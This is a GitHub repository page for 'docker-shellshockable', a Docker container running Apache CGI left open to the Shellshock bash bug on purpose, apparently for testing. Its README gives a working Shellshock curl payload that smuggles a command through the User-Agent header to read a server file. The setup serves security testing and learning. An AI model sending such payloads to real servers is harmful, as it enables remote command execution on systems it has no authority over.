GitXplorerGitXplorer
Z

docker-shellshockable

public
13 stars
11 forks
1 issues

Commits

List of commits on branch master.
Verified
7c1ac653e394536e2c31215cc0395d310e9de564

Merge pull request #1 from subramani95/patch-1

ZZenithar committed 7 years ago
Verified
b92f560e1b2e806deee58dc139676a6ba0d46440

Update README.md

ssubramani95 committed 7 years ago
Unverified
81ef9e3f57fd0428de093cf92b11aaeb83847850

Add test commands

ZZenithar committed 10 years ago
Unverified
193097275bd70accff0e50f366b3415a83c6a82c

[APP] Downgrade bash to vanilla.

committed 10 years ago
Unverified
9ebc577038a8dbc9fbe57ce33e26408dea339940

[APP] Initial commit

committed 10 years ago
Unverified
fae2e182b97b18576df9c46b7ef33ed6ae920b7a

Initial commit

ZZenithar committed 10 years ago

README

The README file for this repository.

docker-shellshockable

Docker container with Apache 2 / CGI shellshock vulnerable.

#> docker run -d --name shellshock zenithar/shellshockable
#> docker ps
#> export WEBSRV=`docker inspect --format "{{.NetworkSettings.IPAddress}}" shellshock`
#> curl http://$WEBSRV/cgi-bin/shockme.cgi
#> curl -A "() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/cat /usr/lib/cgi-bin/shockme.cgi" http://$WEBSRV/cgi-bin/shockme.cgi